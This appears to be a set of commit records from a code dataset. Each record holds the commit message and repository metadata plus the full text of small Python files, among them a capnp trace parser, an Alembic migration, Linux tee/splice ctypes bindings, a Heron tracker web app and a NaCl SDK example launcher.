Add its directory to the PYTHONPATH environmental variable or
copy it to the current working directory.
The pycapnp library is required:
See http://jparyani.github.io/pycapnp/install.html for further details.
Generate the *.capnp.bin file with:
bin/sigil2 --backend=stgen -l capnp --executable=...
Run this script as:
./stgen_capnp_parser.py sigil.events-#.capnp.bin.gz
OR
gunzip sigil.events-#.capnp.bin.gz
./stgen_capnp_parser.py sigil.events-#.capnp.bin
"""
import sys
import os
from warnings import warn
import capnp
import STEventTrace_capnp
def processSTEventTrace(file):
    """Walk every event in a packed STEventTrace stream.

    Reads successive packed EventStream messages from *file* and touches
    each field of every event type; serves as executable documentation of
    the schema layout (see the module docstring).
    """
    for stream in (STEventTrace_capnp.EventStream
                   .read_multiple_packed(file, traversal_limit_in_words=2**63)):
        for event in stream.events:
            which = event.which()
            if which == 'comp':
                event.comp.iops  # IOPs value
                event.comp.flops  # FLOPs value
                event.comp.writes  # writes value
                event.comp.reads  # reads value
                for write in event.comp.writeAddrs:
                    write.start  # start of address range
                    write.end  # end of address range
                # Bug fix: this loop previously iterated writeAddrs again,
                # so read address ranges were never visited.  Assumes the
                # schema names the field readAddrs, mirroring writeAddrs —
                # confirm against STEventTrace.capnp.
                for read in event.comp.readAddrs:
                    read.start  # start of address range
                    read.end  # end of address range
            elif which == 'comm':
                for edge in event.comm.edges:
                    # the thread-event tuple that generated
                    # this communication edge
                    edge.producerThread
                    edge.producerEvent
                    for addr in edge.addrs:
                        addr.start  # start of address range
                        addr.end  # end of address range
            elif which == 'sync':
                if event.sync.type == 'spawn':
                    event.sync.id  # spawned thread id
                elif event.sync.type == 'join':
                    event.sync.id  # joined thread id
                elif event.sync.type == 'barrier':
                    event.sync.id  # barrier id
                elif event.sync.type == 'sync':
                    event.sync.id
                elif event.sync.type == 'lock':
                    event.sync.id  # lock mutex
                elif event.sync.type == 'unlock':
                    event.sync.id  # unlock mutex
                elif event.sync.type == 'condWait':
                    event.sync.id  # condition variable
                elif event.sync.type == 'condSignal':
                    event.sync.id  # condition variable
                elif event.sync.type == 'condBroadcast':
                    event.sync.id  # condition variable
                elif event.sync.type == 'spinLock':
                    event.sync.id  # lock id
                elif event.sync.type == 'spinUnlock':
                    event.sync.id  # unlock id
                else:
                    raise Exception('unhandled sync event')
            elif which == 'marker':
                # the number of instructions since the last marker
                event.marker.count
if __name__ == '__main__':
    filepath = sys.argv[1]
    name, ext = os.path.splitext(filepath)
    if ext == '.gz':
        # Decompress through a pipe; see
        # https://github.com/jparyani/pycapnp/issues/80
        f = os.popen('cat ' + filepath + ' | gzip -d')
    else:
        if ext != '.bin':
            warn('not a .bin file')
        # Packed capnp data is binary: open in 'rb' (text-mode 'r' breaks
        # on Python 3 and mangles bytes on Windows).
        f = open(filepath, 'rb')
    processSTEventTrace(f)
| bsd-3-clause | Python |
|
a1d2023aa6e8baa89747497e69a0a79fe1a27bdd | Drop ProjectPlan table | dropbox/changes,dropbox/changes,wfxiang08/changes,bowlofstew/changes,bowlofstew/changes,dropbox/changes,wfxiang08/changes,dropbox/changes,wfxiang08/changes,wfxiang08/changes,bowlofstew/changes,bowlofstew/changes | migrations/versions/36d7c98ddfee_drop_projectplan_table.py | migrations/versions/36d7c98ddfee_drop_projectplan_table.py | """Drop ProjectPlan table
Revision ID: 36d7c98ddfee
Revises: 12569fada93
Create Date: 2014-10-14 11:25:48.151275
"""
# revision identifiers, used by Alembic.
revision = '36d7c98ddfee'
down_revision = '12569fada93'
from alembic import op
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('project_plan')
def downgrade():
raise NotImplementedError
| apache-2.0 | Python |
|
730b208b490290c84bde8aa017a8f556d457d729 | add list to integer | dragonwolverines/DataStructures,dragonwolverines/DataStructures,dragonwolverines/DataStructures | resource-4/combinatorics/digits/list-to-integer.py | resource-4/combinatorics/digits/list-to-integer.py | def listToInt(listt,base=2):
return reduce(lambda x,y:base*x+y,reversed(listt), 0)
| bsd-2-clause | Python |
|
61e16d12bcd945b44896e87bcb21ce750cd507e5 | Add `bindings` module | NicolasT/tee-n-splice | bindings.py | bindings.py | '''
Bindings to the `tee` and `splice` system calls
'''
import os
import ctypes
import ctypes.util
#pylint: disable=C0103,R0903,R0913
__all__ = ['tee', 'splice']
_c_loff_t = ctypes.c_uint64
_libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
class Tee(object):
'''Binding to `tee`'''
def __init__(self):
c_tee = _libc.tee
c_tee.argtypes = [
ctypes.c_int,
ctypes.c_int,
ctypes.c_size_t,
ctypes.c_uint
]
c_tee.restype = ctypes.c_ssize_t
self._c_tee = c_tee
def __call__(self, fd_in, fd_out, len_, flags):
'''See `man 2 tee`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on
`splice`).
'''
if not isinstance(flags, (int, long)):
c_flags = ctypes.c_uint(reduce(lambda a, b: a | b, flags, 0))
else:
c_flags = ctypes.c_uint(flags)
c_fd_in = ctypes.c_int(getattr(fd_in, 'fileno', lambda: fd_in)())
c_fd_out = ctypes.c_int(getattr(fd_out, 'fileno', lambda: fd_out)())
c_len = ctypes.c_size_t(len_)
res = self._c_tee(c_fd_in, c_fd_out, c_len, c_flags)
if res == -1:
errno_ = ctypes.get_errno()
raise OSError(errno_, os.strerror(errno_))
return res
tee = Tee()
del Tee
class Splice(object):
'''Binding to `splice`'''
# From `bits/fcntl-linux.h`
SPLICE_F_MOVE = 1
SPLICE_F_NONBLOCK = 2
SPLICE_F_MORE = 4
SPLICE_F_GIFT = 8
def __init__(self):
c_splice = _libc.splice
c_loff_t_p = ctypes.POINTER(_c_loff_t)
c_splice.argtypes = [
ctypes.c_int, c_loff_t_p,
ctypes.c_int, c_loff_t_p,
ctypes.c_size_t,
ctypes.c_uint
]
c_splice.restype = ctypes.c_ssize_t
self._c_splice = c_splice
def __call__(self, fd_in, off_in, fd_out, off_out, len_, flags):
'''See `man 2 splice`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on this
object).
Returns a tuple of the result of the `splice` call, the output value of
`off_in` and the output value of `off_out` (or `None`, if applicable).
'''
# TODO: Passing non-`None` values for the offsets (and the corresponding
# effect on the result of this function call) is untested.
if not isinstance(flags, (int, long)):
c_flags = ctypes.c_uint(reduce(lambda a, b: a | b, flags, 0))
else:
c_flags = ctypes.c_uint(flags)
c_fd_in = ctypes.c_int(getattr(fd_in, 'fileno', lambda: fd_in)())
c_fd_out = ctypes.c_int(getattr(fd_out, 'fileno', lambda: fd_out)())
c_off_in = \
ctypes.byref(_c_loff_t(off_in)) if off_in is not None else None
c_off_out = \
ctypes.byref(_c_loff_t(off_out)) if off_out is not None else None
c_len = ctypes.c_size_t(len_)
res = self._c_splice(
c_fd_in, c_off_in, c_fd_out, c_off_out, c_len, c_flags)
if res == -1:
errno_ = ctypes.get_errno()
raise OSError(errno_, os.strerror(errno_))
return (
res,
c_off_in.contents if c_off_in is not None else None,
c_off_out.contents if c_off_out is not None else None)
splice = Splice()
del Splice
| apache-2.0 | Python |
|
5e3bc841800bb4e92df5871d97559810d67d7660 | Create __init__.py | lyelindustries/IPM | cmd/__init__.py | cmd/__init__.py | __version__ = '0.0.0'
| mit | Python |
|
2acb5d6da30c9b25eb05ca7a0da77bdaa45499a5 | Create cod_variable.py | nrikee/Compresion-indices | cod_variable.py | cod_variable.py | def encode_single_vb(n):
byts = []
while True:
byts.append(n % 128)
if n < 128:
break
n //= 128
byts = byts[::-1]
byts[-1] += 128
return [bin(n)[2:] for n in byts]
def encode_vb(numbers):
bytestream = []
for n in numbers:
bytestream.extend(encode_single_vb(n))
return bytestream
| mit | Python |
|
624c133ba1afdb904e31742ac5f00a76859ab5b7 | Write some docs for the response object | bufferapp/buffer-python,vtemian/buffpy | buffer/response.py | buffer/response.py | class ResponseObject(dict):
'''
Simple data structure that convert any dict to an empty object
where all the atributes are the keys of the dict, but also preserve a dict
behavior
e.g:
obj = ResponseObject({'a':'b'})
obj.key = 'value'
obj.a => 'b'
obj => {'a': 'b', 'key': 'value'}
'''
def __init__(self, *args, **kwargs):
    # Initialise the dict normally, then alias the instance __dict__ to the
    # mapping itself so keys double as attributes; nested plain dicts are
    # wrapped first by _check_for_inception.
    super(ResponseObject, self).__init__(*args, **kwargs)
    self.__dict__ = self._check_for_inception(self)
def _check_for_inception(self, root_dict):
    '''Wrap any plain-dict values of *root_dict* as ResponseObject.

    Deeper nesting is handled because ResponseObject's own __init__
    calls this method again on each wrapped value.
    '''
    for key in root_dict:
        value = root_dict[key]
        # Only exact dicts are converted (type(), not isinstance), so
        # already-wrapped ResponseObject values are left untouched.
        if type(value) == dict:
            root_dict[key] = ResponseObject(value)
    return root_dict
def set_for(self, cls):
    # Expose this object's attributes on another object.
    # NOTE(review): assigning __dict__ shares (not copies) the mapping, so
    # later mutations are visible on both sides — confirm that is intended.
    cls.__dict__ = self.__dict__
| class ResponseObject(dict):
def __init__(self, *args, **kwargs):
super(ResponseObject, self).__init__(*args, **kwargs)
self.__dict__ = self._check_for_inception(self)
def _check_for_inception(self, root_dict):
for key in root_dict:
if type(root_dict[key]) == dict:
root_dict[key] = ResponseObject(root_dict[key])
return root_dict
def set_for(self, cls):
cls.__dict__ = self.__dict__
| mit | Python |
d22242bda1a15cf59e395177c44b6d2701a5e246 | add code to replicate issue #376 | mmottahedi/nilmtk,nilmtk/nilmtk,josemao/nilmtk,pauldeng/nilmtk,AlexRobson/nilmtk,jaduimstra/nilmtk,HarllanAndrye/nilmtk,nilmtk/nilmtk | tests_on_large_datasets/redd_house3_f1_score.py | tests_on_large_datasets/redd_house3_f1_score.py | from __future__ import print_function, division
from nilmtk import DataSet, HDFDataStore
from nilmtk.disaggregate import fhmm_exact
from nilmtk.metrics import f1_score
from os.path import join
import matplotlib.pyplot as plt
"""
This file replicates issue #376 (which should now be fixed)
https://github.com/nilmtk/nilmtk/issues/376
"""
# Location of the REDD dataset and which building to disaggregate.
data_dir = '/data/REDD'
building_number = 3
disag_filename = join(data_dir, 'disag-fhmm' + str(building_number) + '.h5')
data = DataSet(join(data_dir, 'redd.h5'))
print("Loading building " + str(building_number))
elec = data.buildings[building_number].elec
# Train an FHMM on the five highest-energy submeters.
top_train_elec = elec.submeters().select_top_k(k=5)
fhmm = fhmm_exact.FHMM()
fhmm.train(top_train_elec)
# Disaggregate the mains channel and persist the result to HDF5.
output = HDFDataStore(disag_filename, 'w')
fhmm.disaggregate(elec.mains(), output)
output.close()
### f1score fhmm
# Score the disaggregation against ground truth and plot per-appliance f1.
disag = DataSet(disag_filename)
disag_elec = disag.buildings[building_number].elec
f1 = f1_score(disag_elec, elec)
f1.index = disag_elec.get_labels(f1.index)
f1.plot(kind='barh')
plt.ylabel('appliance');
plt.xlabel('f-score');
plt.title("FHMM");
plt.savefig(join(data_dir, 'f1-fhmm' + str(building_number) + '.png'))
disag.store.close()
####
print("Finishing building " + str(building_number))
| apache-2.0 | Python |
|
80bf877306a78a63cf7752975f980a2d435f7d5e | Add standard services and lazy service wrapper | polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon | polyaxon/libs/services.py | polyaxon/libs/services.py | import inspect
import itertools
import logging
from django.utils.functional import empty, LazyObject
from libs.imports import import_string
logger = logging.getLogger(__name__)
class InvalidService(Exception):
    """Raised when a service backend's configuration fails validation."""
class Service(object):
    """Base contract that Polyaxon standard services implement."""

    # Names re-exported when the service is dumped into a namespace.
    __all__ = ()

    def validate(self):
        """Validate the settings for this backend (i.e. such as proper connection info).

        Raise ``InvalidService`` if there is a configuration error.
        """

    def setup(self):
        """Initialize this service."""
class LazyServiceWrapper(LazyObject):
    """Lazyily instantiates a Polyaxon standard service class.

    >>> LazyServiceWrapper(BaseClass, 'path.to.import.Backend', {})

    Provides an ``expose`` method for dumping public APIs to a context, such as module locals:

    >>> service = LazyServiceWrapper(...)
    >>> service.expose(locals())
    """

    def __init__(self, backend_base, backend_path, options):
        super(LazyServiceWrapper, self).__init__()
        # Write straight into __dict__ so LazyObject's attribute
        # interception does not trigger a premature _setup().
        self.__dict__.update(
            backend_base=backend_base,
            _backend_path=backend_path,
            _options=options,
        )

    def __getattr__(self, name):
        # Instantiate the real backend on first attribute access.
        if self._wrapped is empty:
            self._setup()
        return getattr(self._wrapped, name)

    def _setup(self):
        backend_cls = import_string(self._backend_path)
        assert issubclass(backend_cls, Service)
        self._wrapped = backend_cls(**self._options)

    def expose(self, context):
        """Dump the backend's public API (plus validate/setup) into *context*."""
        base = self.backend_base
        for attr in itertools.chain(base.__all__, ('validate', 'setup')):
            member = getattr(base, attr)
            # NOTE(review): on Python 3 plain functions on a class are not
            # `inspect.ismethod`; only methods bound to the class (e.g.
            # classmethods) take the lambda path — confirm intended.
            if inspect.ismethod(member):
                # Outer lambda binds `attr` eagerly, avoiding the classic
                # late-binding-in-a-loop pitfall.
                context[attr] = (lambda f: lambda *a, **k: getattr(self, f)(*a, **k))(attr)
            else:
                context[attr] = member
| apache-2.0 | Python |
|
e204dd02b44066b28d09c0143cdeec557ff420fd | add a module for effects that can be applied to waveforms | fretboardfreak/potty_oh,fretboardfreak/potty_oh | potty_oh/effects.py | potty_oh/effects.py | # Copyright 2016 Curtis Sand
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""effects.py: a library of effects to apply to waveforms."""
from matplotlib import pyplot
from .waveform import Waveform
def normalize(waveform):
    """Scale a waveform so its peak absolute amplitude is 1.0.

    Accepts either an object exposing a ``frames`` attribute (e.g. a
    Waveform) or the raw sample sequence itself.  The samples are scaled
    in place via ``*=`` (assumes the container supports scalar in-place
    multiply, e.g. a numpy array — TODO confirm for other callers) and
    the scaled sample container is returned.
    """
    # Duck-type on the `frames` attribute instead of isinstance(Waveform).
    wavedata = getattr(waveform, 'frames', waveform)
    if not len(wavedata):
        return wavedata
    # Fix: normalize by the peak *absolute* amplitude; the original used
    # max(wavedata), which is wrong when the extreme sample is negative.
    peak = max(abs(sample) for sample in wavedata)
    if peak == 0:
        # Silent input: nothing to scale (avoids division by zero).
        return wavedata
    wavedata *= 1.0 / peak
    return wavedata
| apache-2.0 | Python |
|
b9a8d24048a5c5b83a996f9fb1b2b07857a56db0 | unwind the changes to tracker main | moomou/heron,cs564/heron,srkukarni/heron,srkukarni/heron,objmagic/heron,wangli1426/heron,zhangzhonglai/heron,lewiskan/heron,streamlio/heron,huijunwu/heron,srkukarni/heron,zhangzhonglai/heron,lukess/heron,tomncooper/heron,nlu90/heron,ashvina/heron,tomncooper/heron,cs564/heron,nlu90/heron,streamlio/heron,twitter/heron,huijunwu/heron,objmagic/heron,tomncooper/heron,lewiskan/heron,billonahill/heron,twitter/heron,objmagic/heron,lucperkins/heron,huijunwu/heron,tomncooper/heron,cliffyg/heron,mycFelix/heron,srkukarni/heron,moomou/heron,ashvina/heron,billonahill/heron,nlu90/heron,moomou/heron,billonahill/heron,cs564/heron,srkukarni/heron,lukess/heron,lucperkins/heron,lewiskan/heron,cs564/heron,cliffyg/heron,cliffyg/heron,lukess/heron,zhangzhonglai/heron,cliffyg/heron,ashvina/heron,mycFelix/heron,moomou/heron,lucperkins/heron,mycFelix/heron,streamlio/heron,lewiskan/heron,tomncooper/heron,lucperkins/heron,twitter/heron,tomncooper/heron,wangli1426/heron,srkukarni/heron,moomou/heron,moomou/heron,cliffyg/heron,billonahill/heron,wangli1426/heron,objmagic/heron,lukess/heron,billonahill/heron,lucperkins/heron,moomou/heron,cs564/heron,zhangzhonglai/heron,wangli1426/heron,objmagic/heron,ashvina/heron,ashvina/heron,streamlio/heron,cliffyg/heron,mycFelix/heron,lewiskan/heron,billonahill/heron,wangli1426/heron,streamlio/heron,zhangzhonglai/heron,srkukarni/heron,ashvina/heron,billonahill/heron,moomou/heron,lucperkins/heron,zhangzhonglai/heron,tomncooper/heron,streamlio/heron,zhangzhonglai/heron,cs564/heron,cs564/heron,cliffyg/heron,huijunwu/heron,ashvina/heron,nlu90/heron,zhangzhonglai/heron,nlu90/heron,cliffyg/heron,wangli1426/heron,lucperkins/heron,lukess/heron,wangli1426/heron,mycFelix/heron,ashvina/heron,moomou/heron,tomncooper/heron,lukess/heron,twitter/heron,nlu90/heron,twitter/heron,srkukarni/heron,mycFelix/heron,objmagic/heron,lewiskan/heron,nlu90/heron,lewiskan/heron,lukess/heron,zhangzhonglai/heron,w
angli1426/heron,huijunwu/heron,wangli1426/heron,mycFelix/heron,cliffyg/heron,tomncooper/heron,streamlio/heron,streamlio/heron,twitter/heron,mycFelix/heron,huijunwu/heron,huijunwu/heron,billonahill/heron,ashvina/heron,lewiskan/heron,nlu90/heron,mycFelix/heron,cs564/heron,objmagic/heron,lucperkins/heron,lukess/heron,nlu90/heron,lukess/heron,objmagic/heron,huijunwu/heron,streamlio/heron,cs564/heron,twitter/heron,objmagic/heron,billonahill/heron,twitter/heron,lewiskan/heron | heron/tracker/src/python/main.py | heron/tracker/src/python/main.py | import os
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.escape import json_encode, utf8
from tornado.options import define, options
from heron.tracker.src.python import handlers
from heron.tracker.src.python import log
from heron.tracker.src.python.log import Log as LOG
from heron.tracker.src.python.tracker import Tracker
# Command-line flags (tornado.options): state-location config (ZooKeeper-backed
# default) and the HTTP port the Tracker listens on.
define("stateconf", default='zkstateconf', help="Yaml config file without extension for state locations")
define("port", default=8888, type=int, help="HTTP port to run the Tracker")
class Application(tornado.web.Application):
    """Tornado application exposing the Heron Tracker HTTP API."""

    def __init__(self):
        tracker = Tracker()
        self.tracker = tracker
        tracker.synch_topologies(options.stateconf)
        # (url pattern, handler) pairs that all receive the shared tracker.
        tracker_endpoints = [
            (r"/topologies", handlers.TopologiesHandler),
            (r"/topologies/states", handlers.StatesHandler),
            (r"/topologies/info", handlers.TopologyHandler),
            (r"/topologies/logicalplan", handlers.LogicalPlanHandler),
            (r"/topologies/physicalplan", handlers.PhysicalPlanHandler),
            (r"/topologies/executionstate", handlers.ExecutionStateHandler),
            (r"/topologies/metrics", handlers.MetricsHandler),
            (r"/topologies/metricstimeline", handlers.MetricsTimelineHandler),
            (r"/topologies/metricsquery", handlers.MetricsQueryHandler),
            (r"/topologies/exceptions", handlers.ExceptionHandler),
            (r"/topologies/exceptionsummary", handlers.ExceptionSummaryHandler),
            (r"/machines", handlers.MachinesHandler),
            (r"/topologies/pid", handlers.PidHandler),
            (r"/topologies/jstack", handlers.JstackHandler),
            (r"/topologies/jmap", handlers.JmapHandler),
            (r"/topologies/histo", handlers.MemoryHistogramHandler),
        ]
        routes = [(r"/", handlers.MainHandler)]
        routes.extend((pattern, handler, {"tracker": tracker})
                      for pattern, handler in tracker_endpoints)
        routes.append((r"(.*)", handlers.DefaultHandler))
        settings = dict(static_path=os.path.dirname(__file__))
        tornado.web.Application.__init__(self, routes, **settings)
def main():
    """Configure logging, parse command-line flags and serve the Tracker."""
    log.configure(log.logging.DEBUG)
    options.parse_command_line()
    LOG.info("Running on port: " + str(options.port))
    server = tornado.httpserver.HTTPServer(Application())
    server.listen(options.port)
    tornado.ioloop.IOLoop.instance().start()


if __name__ == "__main__":
    main()
| import os
import sys
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.escape import json_encode, utf8
from tornado.options import define, options
from heron.tracker.src.python import handlers
from heron.tracker.src.python import log
from heron.tracker.src.python.log import Log as LOG
from heron.tracker.src.python.tracker import Tracker
# Command-line flags (tornado.options): state-location config (file-backed
# default) and the HTTP port the Tracker listens on.
define("stateconf", default='filestateconf', help="Yaml config file without extension for state locations")
define("port", default=8888, type=int, help="HTTP port to run the Tracker")
class Application(tornado.web.Application):
    """Tornado application wiring the Heron Tracker REST endpoints."""

    def __init__(self):
        tracker = Tracker()
        self.tracker = tracker
        tracker.synch_topologies(options.stateconf)
        # Handlers that are constructed with the shared tracker instance.
        tracked = [
            (r"/topologies", handlers.TopologiesHandler),
            (r"/topologies/states", handlers.StatesHandler),
            (r"/topologies/info", handlers.TopologyHandler),
            (r"/topologies/logicalplan", handlers.LogicalPlanHandler),
            (r"/topologies/physicalplan", handlers.PhysicalPlanHandler),
            (r"/topologies/executionstate", handlers.ExecutionStateHandler),
            (r"/topologies/metrics", handlers.MetricsHandler),
            (r"/topologies/metricstimeline", handlers.MetricsTimelineHandler),
            (r"/topologies/metricsquery", handlers.MetricsQueryHandler),
            (r"/topologies/exceptions", handlers.ExceptionHandler),
            (r"/topologies/exceptionsummary", handlers.ExceptionSummaryHandler),
            (r"/machines", handlers.MachinesHandler),
            (r"/topologies/pid", handlers.PidHandler),
            (r"/topologies/jstack", handlers.JstackHandler),
            (r"/topologies/jmap", handlers.JmapHandler),
            (r"/topologies/histo", handlers.MemoryHistogramHandler),
        ]
        tornadoHandlers = (
            [(r"/", handlers.MainHandler)]
            + [(url, cls, {"tracker": tracker}) for url, cls in tracked]
            + [(r"(.*)", handlers.DefaultHandler)]
        )
        settings = dict(
            static_path=os.path.dirname(__file__)
        )
        tornado.web.Application.__init__(self, tornadoHandlers, **settings)
def main():
    """Entry point: set up logging, parse flags and start the HTTP server."""
    log.configure(log.logging.DEBUG)
    options.parse_command_line()
    port = options.port
    LOG.info("Running on port: %s" % port)
    http_server = tornado.httpserver.HTTPServer(Application())
    http_server.listen(port)
    tornado.ioloop.IOLoop.instance().start()


if __name__ == "__main__":
    main()
| apache-2.0 | Python |
3a6d41d8123b27ca5b22f7d7630e40faef3595c1 | Add a top-level script that replaces the top-level makefile. | sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk,sbc100/nativeclient-sdk | examples/run.py | examples/run.py | #!/usr/bin/python
#
# Copyright 2010, The Native Client SDK Authors. All Rights Reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
#
"""Build and run the SDK examples.
This script tries to find an installed version of the Chrome Browser that can
run the SDK examples. If such a version is installed, it builds the publish
versions of each example, then launches a local http server. It then runs
the installed verison of the Chrome Browser, open to the URL of the requested
example.
Options:
--chrome-path=<abs_path> Absolute path to the Chrome Browser used to run
the examples.
--example=<example> Run |example|. Possible values are: hello_world,
pi_generator and tumbler.
"""
import getopt
import os
import subprocess
import sys
import urllib
# Usage text printed when -h/--help is given (raised via the Usage exception).
help_message = '''
--chrome-path=<abs_path> Absolute path to the Chrome Browser used to run the
examples.
--example=<example> Runs the selected example. Possible values are:
hello_world, pi_generator, tumbler.
'''

# Default Chrome install directory for each sys.platform value.
DEFAULT_CHROME_INSTALL_PATH_MAP = {
'win32': r'c:\AppData\Local\Chromium\Application',
'cygwin': r'c:\cygwin\bin',
'linux': '/opt/google/chrome',
'linux2': '/opt/google/chrome',
'darwin': '/Applications'
}

# Name of the Chrome executable (relative to the install directory) per platform.
CHROME_EXECUTABLE_MAP = {
'win32': 'chrome.exe',
'cygwin': 'chrome.exe',
'linux': 'chrome',
'linux2': 'chrome',
'darwin': 'Chromium.app/Contents/MacOS/Chromium'
}

# Collapse sys.platform variants into the platform token used in publish paths.
PLATFORM_COLLAPSE = {
'win32': 'win32',
'cygwin': 'win32',
'linux': 'linux',
'linux2': 'linux',
'darwin': 'mac',
}

# Port used by the local example HTTP server (started via ./httpd.py below).
SERVER_PORT = 5103
class Usage(Exception):
    """Signals a command-line usage error; carries the message to print."""

    def __init__(self, msg):
        self.msg = msg
def FindChrome(chrome_install_path=None):
    """Look for a Google Chrome executable in |chrome_install_path|.

    If |chrome_install_path| is None, the platform-specific default install
    path is used.  Returns a 2-tuple whose elements are:
      the actual install path used (which might be the default)
      the full path to the executable, or None if Chrome can't be found.
    """
    if chrome_install_path is None:
        # Fall back to the platform-specific default location for Chrome.
        chrome_install_path = DEFAULT_CHROME_INSTALL_PATH_MAP[sys.platform]
    candidate = os.path.join(chrome_install_path,
                             CHROME_EXECUTABLE_MAP[sys.platform])
    if os.path.exists(candidate):
        return chrome_install_path, candidate
    return chrome_install_path, None
# Checks to see if there is a simple HTTP server running on |SERVER_PORT|. Do
# this by attempting to open a URL socket on localhost:|SERVER_PORT|.
def IsHTTPServerRunning():
    """Return True iff an HTTP server answers on localhost:SERVER_PORT."""
    try:
        url = urllib.urlopen('http://localhost:%d' % SERVER_PORT)
    except IOError:
        return False
    # Fix: close the connection instead of leaking the socket.
    url.close()
    return True
def main(argv=None):
  # Parse options, build the examples with make, ensure the local HTTP
  # server is up, then launch Chrome on the selected example page.
  # Returns a shell-style exit status (2 on usage/configuration errors).
  if argv is None:
    argv = sys.argv
  # Environment variable seeds the Chrome search path; --chrome-path below
  # overrides it.
  chrome_install_path = os.environ.get('CHROME_INSTALL_PATH', None)
  example = 'hello_world'
  try:
    try:
      # NOTE(review): the short-option string has no 'e', so '-e' (unlike
      # '--example') is rejected by getopt even though it is handled below;
      # 'o:' is accepted but never processed -- confirm the intended flags.
      opts, args = getopt.getopt(argv[1:], 'ho:p:v',
                                 ['help', 'example=', 'chrome-path='])
    except getopt.error, msg:
      raise Usage(msg)
    # option processing
    for option, value in opts:
      if option == '-v':
        verbose = True  # NOTE(review): set but never read anywhere.
      if option in ('-h', '--help'):
        raise Usage(help_message)
      if option in ('-e', '--example'):
        example = value
      if option in ('-p', '--chrome-path'):
        chrome_install_path = value
  except Usage, err:
    print >> sys.stderr, sys.argv[0].split('/')[-1] + ': ' + str(err.msg)
    print >> sys.stderr, '--help Print this help message.'
    return 2
  # Look for an installed version of the Chrome Browser.  The default path
  # is platform-dependent, and can be set with the --chrome-path= option.
  chrome_install_path, chrome_exec = FindChrome(chrome_install_path)
  if chrome_exec is None:
    print >> sys.stderr, 'Can\'t find Google Chrome in path \"%s\"' % \
          chrome_install_path
    return 2
  print 'Using Google Chrome found at: ', chrome_exec
  env = os.environ.copy()
  if sys.platform == 'win32':
    # make and the rest of the build toolchain come from cygwin on Windows.
    env['PATH'] = r'c:\cygwin\bin;' + env['PATH']
  # Build the examples.
  make = subprocess.Popen('make publish', env=env, shell=True)
  # communicate() here only waits for make to finish: stderr was not piped,
  # so this second tuple element is always None and make_err goes unused.
  make_err = make.communicate()[1]
  # Run the local http server, if it isn't already running.
  if not IsHTTPServerRunning():
    home_dir = os.path.realpath(os.curdir)
    subprocess.Popen('python ./httpd.py', cwd=home_dir, shell=True)
  else:
    print 'localhost HTTP server is running.'
  # Launch Google Chrome with the desired example.  The page path mirrors
  # the publish/<platform>_<target>/ layout produced by 'make publish'.
  example_url = 'http://localhost:%(server_port)s/publish/' \
                '%(platform)s_%(target)s/%(example)s.html'
  subprocess.Popen(chrome_exec + ' --enable-nacl ' +
                   example_url % ({'server_port':SERVER_PORT,
                                   'platform':PLATFORM_COLLAPSE[sys.platform],
                                   'target':'x86',
                                   'example':example}),
                   env=env,
                   shell=True)
if __name__ == '__main__':
  # Propagate main()'s integer status to the shell.
  sys.exit(main())
| bsd-3-clause | Python |
|
451e8f3ea4765051088ea1c84f81e32691591d89 | Create __init__.py | simonlovgren/maustrobot | core/__init__.py | core/__init__.py | #!/usr/bin/env python
| mit | Python |
|
65aa1424f7ea8e184180d93e790b1ece6705775d | fix missing coma | ccomb/OpenUpgrade,wangjun/odoo,dsfsdgsbngfggb/odoo,dezynetechnologies/odoo,NL66278/OCB,BT-rmartin/odoo,havt/odoo,florentx/OpenUpgrade,bkirui/odoo,funkring/fdoo,gorjuce/odoo,apanju/GMIO_Odoo,massot/odoo,demon-ru/iml-crm,grap/OpenUpgrade,jiachenning/odoo,makinacorpus/odoo,eino-makitalo/odoo,highco-groupe/odoo,JCA-Developpement/Odoo,provaleks/o8,stephen144/odoo,rowemoore/odoo,matrixise/odoo,VielSoft/odoo,xujb/odoo,shivam1111/odoo,alhashash/odoo,elmerdpadilla/iv,leorochael/odoo,odootr/odoo,oasiswork/odoo,Gitlab11/odoo,srsman/odoo,nhomar/odoo,slevenhagen/odoo,leorochael/odoo,ThinkOpen-Solutions/odoo,blaggacao/OpenUpgrade,nhomar/odoo-mirror,Ernesto99/odoo,numerigraphe/odoo,joshuajan/odoo,Endika/OpenUpgrade,abdellatifkarroum/odoo,inspyration/odoo,christophlsa/odoo,poljeff/odoo,stonegithubs/odoo,storm-computers/odoo,alhashash/odoo,pedrobaeza/OpenUpgrade,kirca/OpenUpgrade,idncom/odoo,bplancher/odoo,factorlibre/OCB,jiachenning/odoo,apocalypsebg/odoo,ingadhoc/odoo,blaggacao/OpenUpgrade,ygol/odoo,doomsterinc/odoo,odoousers2014/odoo,funkring/fdoo,colinnewell/odoo,abstract-open-solutions/OCB,takis/odoo,fgesora/odoo,provaleks/o8,osvalr/odoo,Elico-Corp/odoo_OCB,abstract-open-solutions/OCB,agrista/odoo-saas,fgesora/odoo,markeTIC/OCB,tangyiyong/odoo,colinnewell/odoo,prospwro/odoo,sebalix/OpenUpgrade,brijeshkesariya/odoo,leoliujie/odoo,bguillot/OpenUpgrade,blaggacao/OpenUpgrade,lsinfo/odoo,jaxkodex/odoo,kybriainfotech/iSocioCRM,minhtuancn/odoo,gsmartway/odoo,janocat/odoo,PongPi/isl-odoo,x111ong/odoo,mkieszek/odoo,jesramirez/odoo,storm-computers/odoo,dariemp/odoo,fjbatresv/odoo,JonathanStein/odoo,JonathanStein/odoo,savoirfairelinux/OpenUpgrade,abdellatifkarroum/odoo,Ichag/odoo,christophlsa/odoo,bkirui/odoo,tvtsoft/odoo8,ThinkOpe